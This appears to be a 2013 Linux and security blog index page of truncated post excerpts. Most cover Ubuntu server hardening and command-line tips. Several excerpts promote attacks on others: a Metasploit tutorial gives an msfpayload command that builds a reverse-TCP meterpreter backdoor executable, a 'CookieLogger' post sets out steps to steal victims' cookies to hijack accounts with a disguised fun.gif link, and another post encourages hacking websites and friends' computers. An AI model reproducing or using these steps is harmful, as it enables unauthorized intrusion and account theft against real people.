Pages

Sunday 7 July 2013

Ubuntu Server: Scan Open Ports - Nmap.

  • Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing.
  • Open a Terminal and enter the following :
sudo apt-get install nmap
  • Scan your system for open ports with :

Ubuntu Server: Install Firewall - DenyHosts and Fail2Ban.

  • DenyHosts is a python program that automatically blocks SSH attacks by adding entries to /etc/hosts.deny. DenyHosts will also inform Linux administrators about offending hosts, attacked users and suspicious logins
  • Open a Terminal and enter the following :
sudo apt-get install denyhosts

Ubuntu Server: Audit Your System Security - Tiger.

  • Tiger is a security tool that can be use both as a security audit and intrusion detection system.
  • Open a Terminal and enter the following :
sudo apt-get install tiger
  • To run tiger enter :

Ubuntu Server: HTTPS Configuration

The mod_ssl module adds an important feature to the Apache2 server - the ability to encrypt communications. Thus, when your browser is communicating using SSL, the https:// prefix is used at the beginning of the Uniform Resource Locator (URL) in the browser navigation bar.


The mod_ssl module is available in apache2-common package. Execute the following command from a terminal prompt to enable the mod_ssl module:
sudo a2enmod ssl

Saturday 6 July 2013

Kali Linux: Fix Installing & Updating Packages

write in terminal
nano /etc/apt/sources.list
and then replace all text with this
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ – Official Snapshot i386 LIVE/INSTALL $
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ – Official Snapshot i386 LIVE/INSTALL $

Ubuntu Server: Restrict Apache Information Leakage.

  • Edit the Apache2 configuration security file :
sudo vi /etc/apache2/conf.d/security
  • Add or edit the following lines and save :

Ubuntu Server: Harden PHP For Security

  • Edit the php.ini file :
sudo vi /etc/php5/apache2/php.ini
  • Add or edit the following lines an save :

Ubuntu Server: Harden Network With sysctl Settings.

  • The /etc/sysctl.conf file contain all the sysctl settings.
  • Prevent source routing of incoming packets and log malformed IP's enter the following in a terminal window:
sudo vi /etc/sysctl.conf
  • Edit the /etc/sysctl.conf file and un-comment or add the following lines :

Ubuntu Server: SSH Hardening - Disable Root Login And Change Port.

  • The easiest way to secure SSH is to disable root login and change the SSH port to something different than the standard port 22. 
  • Before disabling the root login create a new SSH user and make sure the user belongs to the admin group (see step 4. below regarding the admin group).
  • If you change the SSH port also open the new port you have chosen on the firewall and close port 22.
  • Open a Terminal Window and enter :
sudo vi /etc/ssh/sshd_config

Ubuntu Server: Install Firewall - UFW

The default firewall configuration tool for Ubuntu is ufw. Developed to ease iptables firewall configuration, ufw provides a user friendly way to create an IPv4 or IPv6 host-based firewall.
ufw by default is initially disabled. From the ufw man page:
“ ufw is not intended to provide complete firewall functionality via its command interface, but instead provides an easy way to add or remove simple rules. It is currently mainly used for host-based firewalls. ”
The following are some examples of how to use ufw:

Tuesday 25 June 2013

Linux / UNIX: Login as Root (Ubuntu)

Want to enable root login in Ubuntu ? Well, even though it’s not recommended, it’s still possible to login with the root or administrator account, and this brief tutorial is going to show you how. The reason it’s not recommended is simple; because people make mistakes. Making the smallest mistakes in Ubuntu while login as the root user can completely render your computer inoperable. Besides damaging your system, it also creates security risks to login as the root user.
If you still want to login as the root user after all the risks I mentioned above, then continue below to learn how.

Monday 24 June 2013

Ubuntu Server: Install Webmin In LAMP Server

Webmin is a user friendly and lightweight web-based interface for system administration for linux/unix. running on any browser that supports tables and forms (and Java for the File Manager module). webmin allows you to Managing and configure user accounts, Web server, DNS server,Squid server,DHCP server file sharing etc.
Webmin consists of a simple web server, and a number of CGI programs which directly update system files like /etc/inetd.conf and /etc/passwd. The web server and all CGI programs are written in Perl version 5, and use no non-standard Perl modules

Installing Webmin On Ubuntu Server 12.04 LTS


Tuesday 18 June 2013

Linux / Windows: Hack Remote Computer Via IP & Open Port

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Saturday 8 June 2013

Linux / Unix: Find All Hidden Dot Directories and Delete

I need to clean up my backups stored on the nas server. I need to free up the disk space. How do I find out all hidden dot directories such 

as/nas01/backups/home/user/.gnome/,/nas01/backups/home/user/.gnome/ and so on and delete then in a single pass using Linux or Unix command line option? Please note that I do not want to delete nested hidden directories such as/nas01/backups/home/user/data/.xml,/nas01/backups/home/user/foo/bar/.level/.levle2/ and so on.

Unix system. The search is recursive in that it will search all subdirectories too. The syntax is:

Linux / UNIX: Mount An ISO Image Through Command

How do I mount an ISO image in OpenBSD operating systems using command line options?

You can mount a disk image or ISO images using the mount command. This is useful if you want to copy a few files from an ISO image without burning the image to CD or DVD. You need to use the following commands:

a] vnconfig - The vnconfig command configures vnode pseudo disk devices.
b] mount - Mount file system.
c] umount - Unmount file systems

Syntax

The syntax is:

Ten Things I Wish I Knew Earlier About The Linux Command Line

We all learn new things over time as we use applications with a vast amount of possibilities. Of course, some of those things would have been so useful if we had known them earlier. Here are 10 command line tricks that I wish I had learned much sooner.
Note: these tricks apply to bash, which is the default shell on most Linux systems. If you’re using a different shell, they may not work for you. If you don’t know which shell you have, it’s probably bash, so go ahead and try them!
1.) Ctrl+U and Ctrl+Y.
Do you know that moment when you’re typing a long command, and then suddenly realize you need to execute something else first? Especially when working over an SSH connection, when you can’t easily open a second terminal on the same machine, this can be very annoying. Solution: ensure your cursor is at the end of your current command (shortcut: Ctrl+E), press Ctrl+U to get a clean line, type the other command you need to execute first, execute it, then press Ctrl+Y and voila! Your long command is back on the line. No mouse needed for copying, just quick hotkeys.

Wednesday 5 June 2013

Linux / UNIX: How To Install Bit-Torrent

How To Install Bit-Torrent In Linux

Type this command in terminal " apt-get install qbittorrent  " than hit Enter.

Hack Any Windows 7 With Metasploit


In this tutorial I will exploit a Windows 7 Sp1 OS using Metasploit. I will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework“

Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:


msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe



Kali Linux Basic Commands

Kali Linux Basic Commands

 File Operations


pwd              Print Name Of Current/Working Directory
cd                 Changing The Working Directory
cp                 Copy Files Or Directory
rm                 Remove Files And Directory
ls                   List Of Directory Contents
mkdir             Make Directory
cat                 Concatenate Files And Print On Standard Output
mv                 Move Files
chmod           Change Files Permissions

Sunday 2 June 2013

Linux / UNIX : Easiest Way To Install Flash Player

Easiest Way To Install Flash Player In UNIX.


Type this command in terminal " sudo apt-get install flashplayer-nonfree " and than hit Enter.

Still problem..

Follow The Steps Show In Video Below:

Linux / UNIX : How To Install Skype

Easiest Way To Install Skype In UNIX.

Follow The Steps Show In Video Below:

Saturday 1 June 2013

Linux / UNIX : How To Make Google Chrome As Root

Easiest Way To Make Google Chrome Your Default Browser In UNIX.

Follow The Steps Show In Video Below:



Friday 31 May 2013

Creat CookieLogger To Hack Any Account

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Copy & Save the notepad file from below and Rename it as Fun.gif

<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

Thursday 30 May 2013

Best Keyboard Shortcuts

Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer